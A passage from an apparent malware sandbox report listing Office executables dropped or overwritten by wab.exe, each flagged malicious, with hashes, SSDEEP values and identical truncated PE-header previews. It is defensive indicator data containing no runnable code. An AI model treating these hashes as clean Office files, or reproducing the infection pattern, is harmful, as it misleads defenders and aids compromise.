                                                                                                MD5:92CCB6717B855AAB9FC8F2DD5704DF9E
                                                                                                SHA1:A992665A3EED482629E382BA98CC00D29BD96B08
                                                                                                SHA-256:7C5D9FF38A44CC39E7023D44A89B1B2F7CE3EDD4C7292C89E82018319BE3CF9B
                                                                                                SHA-512:B267F5DB062B05E844D0AC159040CD2BC88257E05B47E70275AD3629DC0331CD53E113D0F4CF6E7105551F13D5DF3C8EBE1CA05E519D84DDD9FA523AE730C8C5
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):101496
                                                                                                Entropy (8bit):5.614417533237859
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoDvpz3ktxGvpzvy5ZWGalHFmMTK0KRTS8bOzc:/rk2ToATzvmN0KRm8bOzc
                                                                                                MD5:7F19345545B8DA667991DEEC3D8F6468
                                                                                                SHA1:66EC1140DD4F3811E4E000E94340469CE42108B4
                                                                                                SHA-256:FD49A52DE21C968484C90DEFEBE9B41A900C0C83D0578B931FFF41A02F6041B3
                                                                                                SHA-512:898F2CCF7F289256A57278D79B9D9F0AFBAE6AEC3761404D00A3C1B98E0467188F33B6C4B0B19CC687DFEEFC2408F4A5D3C3D4FD3BAFA4FE258E922CFC52A76C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):455760
                                                                                                Entropy (8bit):5.80402506379432
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:cwACThwS0vn9IdRsLGEJTdPA6lDfZNAGVx:cwACThwSSn2dRANtlF3j
                                                                                                MD5:3B0A8B5E4045F2972D8139D1EB68FF5D
                                                                                                SHA1:91653217660FF749728075DFCDD7DD3935D6DD07
                                                                                                SHA-256:795757B494CE9CF653E25E61512370283B0DCE892F0FA4AD641CE5353BB2E9D7
                                                                                                SHA-512:EBA564D4D158CD2FDBA10A915D2837958EAD114E0A71F31AECDE8BC54A1EBAFE305279A90429D98A7BB6214623D667C704A31B2E788EE974EADB02E0FDB9CEE4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225704
                                                                                                Entropy (8bit):5.993164766056159
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkRLqB8edYkIrv6TXRw9xwqazULDjkAJZo0RAjUIqXfkRC:mjilq8OPwRzso6AQ5yC
                                                                                                MD5:978D692068FFF1979AA85A22C7774B82
                                                                                                SHA1:3356A00B00B04A3DEB7DB995C45990D0C2C99947
                                                                                                SHA-256:0402398E41C93D6925AD34ED076C935E32A0D3437F04621A40A1B36AD83E9855
                                                                                                SHA-512:8410502EB44D2FC186609AC25F29796475F0FCA44688D3266C95FC09FCB350A9ACF7B247797FD9CE71EE4A5D8CCC6F0F32DCFFDA2D5FC5626C7D4C3B6539FD28
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):84928
                                                                                                Entropy (8bit):5.709408438671853
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoY67wZClMML07MiapFmPRHyzMwzobtM+zf:/rkN67wZClMMQ7MiawHyzMwsL
                                                                                                MD5:322701BC6FF92F3789B1C9105C11F393
                                                                                                SHA1:16B5BE10FE983EA904C06891581F127C03915C41
                                                                                                SHA-256:6097218FB5318A7671C154F5D06BCB888296D7BD5E301F6DC3D73363CBEF9713
                                                                                                SHA-512:6549D7DECCDE4489BC04508E562372B94F834EEAEFBAFCF8FB65B600FDF13338AFAA47F9412DC886E38B7E782DBF464AFE37847C4CBB75C3D88759F17AD08208
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):83816
                                                                                                Entropy (8bit):5.759188593692372
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoP0s7wZClMML072apFmPcnGzLHyxz5pOEtmwxz5E:/rkat7wZClMMQ72ahnGzextQyxtE
                                                                                                MD5:9D3499779ECEF0A457BB315144B20EFC
                                                                                                SHA1:F144F384645733E14C1D1923241135D6CD9DA04B
                                                                                                SHA-256:A2A2F6C89369BB6F130D363510E05964829C18F9B928D7836628051C06233675
                                                                                                SHA-512:FEB9CB23D90149AD2CC9EB037B5B9DD810070863EBB3D5787B6BA84C6F98ED496C19201EFCBC0C4A23F835497A4A789E0824FDEA1840D728D334CF240EF38D15
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):233832
                                                                                                Entropy (8bit):6.144128303355593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkGW32GhNvMQ/58sl2U2Gszlz4SNBZCgMWku:g2GhN0lsdspzPgg1
                                                                                                MD5:D932FC7F938D7FAA076BDF0F32C1C14C
                                                                                                SHA1:289A2046B00A40433ED38C2E87BDB29EBF58D63E
                                                                                                SHA-256:FCC50AE05512C451B0F9C0C89582C0F8411C1A52A99F1C51AD39902478BE59E4
                                                                                                SHA-512:DF559DBD4E0918B205C94F2BE0361C7FD50BC9431AF41A90EAB35743B288EA208F658799E0CA96D29892D6A89A9F5A37DE6DB5684B898526F39B0AE46A8F9C4A
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):502632
                                                                                                Entropy (8bit):6.587262136505295
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:RWDxGH79J2VX5gEpvm7JA8I6BHAlSpFG/+Ls3ze30xB7zq2zs:2MxCvm7JK6JAB/6N30xpI
                                                                                                MD5:097728BC9E3AD3C6955B58A1CCB73D23
                                                                                                SHA1:832DDD4349D69A41DC22131C341094A55742EE68
                                                                                                SHA-256:1D19D526CB1E90C4C0553E74ED0DD07996AA9379764D76FAFFA2C8394A8BF81D
                                                                                                SHA-512:DAE8E3CC44495E9A3FD45AA4DA02123DEE714AF06E88DAEAA8FC4F03CAD53B07CF3DB47F90C95E01CF65F2B045F9BE6F8CEF15908224226EE7C54E902519C77A
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):352704
                                                                                                Entropy (8bit):6.234328618673098
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:TEshacHeGXduZtZ9zHVcI3uv7FgR3FTzWQ/ZZyp1:IsHHrtuZtPvh3FuQ/jyp1
                                                                                                MD5:23DBC58CDF96B3DC8D931BCBCD1F0259
                                                                                                SHA1:C771539F3FA9F1AF9A9E9D6F257A9A3C5317772E
                                                                                                SHA-256:63DB8B997CB7CDCAC4360929C5998A232B9A429DDD74A88EEAEB8AAA29D24474
                                                                                                SHA-512:CDD9152B00EA205E0238FD7997FD96B2CF0718E7290630718B1128998F80E9F0E3C347DE1C476AAB67DC7E09BC8CA816CA39D321D85BB03DACF06269C9F5F169
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4395184
                                                                                                Entropy (8bit):5.9241413364591375
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:cXuo5RMru45b5dZlAj0sqW7YDKMzVwgBWMTwLe7G:OR345NRAgsr7QH6h93
                                                                                                MD5:6B5846BC42DB676458124E9B64BEF429
                                                                                                SHA1:764B0FC6F01544F8E39BBEE16E55B5A1ADFDB014
                                                                                                SHA-256:CEE14668777B06EAB589D4D29A9510B89A0A0D62DACFD2FED1CEC7ACFD66960E
                                                                                                SHA-512:34257DCA4FFE6CE8C402F9E065DF582B4E221E14D3AFE622909B0AE48C80CCB212378B7437B5FF78E013B995F712B0BE79902500343CFE46D7F6127AA584090F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):603928
                                                                                                Entropy (8bit):6.447229278008163
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:hzKRgqBDxoiPCLXHLuk/Wg4Reh2mbeF+IGboJdx:hKgMxoiPoXruPi/++IvJdx
                                                                                                MD5:8EF30B3A7AEB63420B6DD95D081D9046
                                                                                                SHA1:871F1B5483B0487627DEADBC7316C8B9440042E8
                                                                                                SHA-256:B1C572271C709039685AE45086A1D3B57EE8F31D6A9030C6F47DAAF2551A6449
                                                                                                SHA-512:B5A9A27D83F5D4F5169DAA58D348C855ACDD37C8D05436F1B63725517E8C0ABB637181CC569DDDBF8EF1603F5143EF844577E1DC664405033F20E2156445E984
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):507024
                                                                                                Entropy (8bit):6.027052491483809
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:GyrmBq0RYSv3A5DhW15yChMFt2XTNJWLgCWzzYhPRt+:nrmBjYuALWJMn2XTmL7hPH+
                                                                                                MD5:6C2D19BFA4446F763A05A97156FBF558
                                                                                                SHA1:F08182FA8F68EACB2E906C7627811D490CBD7D14
                                                                                                SHA-256:5234568C60B2F49995703548666C8A2DCD7745019122D29DAC1020EA19CE161C
                                                                                                SHA-512:57AF1362D3422B04AF1CF245A4FD2A1089D024FC679659FBA5F892E1CDCF984F8E6F8652690FA5A9A799DA2B722474B61AE6C32C7CD7A330173EB6D3AD032675
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):251560
                                                                                                Entropy (8bit):6.413231422944333
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:momAAOwPcPIqk4Vsvt0uews+qZP9zOPBxGiryKI:msAETlVsKzZPixGBKI
                                                                                                MD5:4D9D18E2B09F2435D61B77935C0A7664
                                                                                                SHA1:3C0B98D91076BA322485390558E474CF933CD146
                                                                                                SHA-256:8677F97FE78DD2916AB1DFDBCB98FB08652D80F81C4C8FF5EE1C3F8EF3F93051
                                                                                                SHA-512:09393D9CF957E93D3D2B1D747C524C7208A7A404A17BA94B2E0B462632CE03CA2804770B2C670BACEA5C8CBF179CCDE11888670083B99964B4A998CB9B13250F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):751720
                                                                                                Entropy (8bit):6.572900922542691
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:xdI8PdgELg6eaBlnjlZcTerWv+xdeFhvCs9TukINOW:xa8PWELTBlZ+erw+xdeFUsUkEh
                                                                                                MD5:6900C008B34CBCC5A50AA56C83EEB3DD
                                                                                                SHA1:9CD9B4CE42AAD96B998FAC22B0F125D70AD2E5FC
                                                                                                SHA-256:21119A1B53F614118699759D944278DFFD5DE92D285B7250E05E5BB42C444D7C
                                                                                                SHA-512:D41AAF60C3E1A7F7FF972457DF8C5031E7CF133B894AD467D100ED66D342CD893BBA87E9F0397E35F3A3D6690DF19E324B6B029DA20B13981D51485860CB6CDC
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):161968
                                                                                                Entropy (8bit):6.179397526086976
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkbNDS5lS5jITI1FeBT77NDS5lS3j+Wzy6oUSA7hZ:QNDS5lSlFeBTfNDS5lS7zUrsZ
                                                                                                MD5:2D46116FB35E1B827866BFD7581347AA
                                                                                                SHA1:CB5966248987F82189124B1782F84068F75B9B15
                                                                                                SHA-256:6406E08D3292F2A72548F766EC5ABEC2AD7DB3E4D8A42F7F33AC56ADFFA487C3
                                                                                                SHA-512:A87CE9F9E76E98655EA7310466E314FAF5CC98E3AF8B46E2E2908294A3995027960D4BD42356FD2F7019B71055512937565A1DE375DEB4111D052B2F30C42641
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):159560
                                                                                                Entropy (8bit):6.228746819324478
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk+klWPsom9TiWWWWWWWQM+FtWAzhIwaeENinkf8xw3xUFv2tGPrtPmF:Bb5zPaNQnBxw34Oita
                                                                                                MD5:1E2398318A0110A81DAAECBE4A1020C2
                                                                                                SHA1:DEB0A629A1BEFE2059CA8195A55BFB31EB18C557
                                                                                                SHA-256:32F7146C09BF7270AE036DD8AEC6C398B9611D1D00CA131BE697BA65A1BD4A3F
                                                                                                SHA-512:C9616CBE33AF9C57C5D918953592388376F7114DDF37F8C9AE4F834420F627CA4F1F89159DA02F5AF6D029CD60549490B99D45627A7F39E06CD250CA840F66EB
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2233240
                                                                                                Entropy (8bit):6.273525911634119
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:FDZgOA74U4o//sbtwvZTqFDk9sg71SmY90gh/G7QJoma+9duNGeVG29H:FqHVhTr5UmY90sGE5dIDG29H
                                                                                                MD5:1BCB6735406FB145CADA541083819C2B
                                                                                                SHA1:3CFD31C066860F804E658DBB76CF6CE14D342A24
                                                                                                SHA-256:4D7B34ED22D207B0BD737C7CAF2137DBC2F3C47BAE9E753DDD02EC5072FEC989
                                                                                                SHA-512:3F533C971AB5824DD75FA8D035503BD12F30D5099C0AA6F8CEB08429EE91B703CCDDC4A2A3442B850C057945A176F1A2B4F6D20FF259A682D285822A12CFB5DD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):214432
                                                                                                Entropy (8bit):5.707538571611537
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkeVFptXofXXXXXXuh9gLzltw6Q1hqOJHrtTh:rtXofXXXXXXASLzb9uhqK
                                                                                                MD5:9FA79F3FD29775D061E8E14C460E4C66
                                                                                                SHA1:57859E5326791527692F5F825DC0ECD2670A1FBC
                                                                                                SHA-256:F9FFA9E69AAA1A753087479D138A0FF14CF3C74F32FECD1659C29CCEF77F5ACB
                                                                                                SHA-512:EBEEE5EC5199BB7F0B09D89D033C351797905C242CF9B73F26A69AFBD079D19B9EBA8AA6AE3319E3E0FC49FFBB8916D3D2EC3376A117A5E73F47EB27AF4D2744
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):620840
                                                                                                Entropy (8bit):6.51363323895205
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:soBdI/BUQtsfBCegl2eccL1q/xRyye7BfcwqEhDe:soM/BB0Bml2m1q/xRPCcwFC
                                                                                                MD5:ED4493E7B083EC9BE4A475763BFF5F33
                                                                                                SHA1:47A57367C50E528213DA802D54C6C4C8B310C8DC
                                                                                                SHA-256:13A1EAF65B046FEA9BC73895CC572D9DA0062DC55636931C5F9AC5379636A581
                                                                                                SHA-512:95DFC4770836D252B0FE9637E1F320D62DAF1C0965795F13E93D8C75BF704D70C754A199E687BFF655AD4A1CD1F998CAF2B9F552E4280E090927B030FBF19A1B
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1568248
                                                                                                Entropy (8bit):5.637684770188403
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:QwF+k53zCG2tIuQ6DtJQSZDhLOhkZzV5i9w/lmd+jrcUiACW:lFXG6uQ6D9L2uV50AlmsjYUiAB
                                                                                                MD5:121C03BBA1251851A260DBF96511E94B
                                                                                                SHA1:E11BABB614ED80A1C9CD053E2D25B6F7DF6E0B29
                                                                                                SHA-256:8C448212DF185668CAF1A984DC7BD9BF6A98FC30EFC35C509B4B6204B1CFA544
                                                                                                SHA-512:0BA4A192DC50C8CF02C1FE67448E907D5F0D68008F2471EEF4DA17D601C5799893E151AE2373594F25C891CCDA6EBD3B02313C5C3D7874D5EC6179FE64978FD0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):634800
                                                                                                Entropy (8bit):6.637580106141556
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:1f/4sOdw+RfEB6tuAlnWhGZco6ijmn5jFTSt7yCPUkazi7JThVoSZeR6aQTJ:h/4Vdw+Ra6V6g2kazidN6SoEVF
                                                                                                MD5:D40F85B4848B912F785873A0F65929F8
                                                                                                SHA1:6DBC6F68210F0614C88123391277797A44EED64A
                                                                                                SHA-256:FA0CF60A3DE793BBFB2BF327A9CD8BF13D7B0A443EE063B160DAAEA98129C678
                                                                                                SHA-512:78D0223530930F5891AE52E7F752B0637B449EEFC0FADF9E3E27B9EABAF49834EFA805A897C512A7D8C09F466DA98A402D09C1F02C6827843E6AF961C60702E6
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
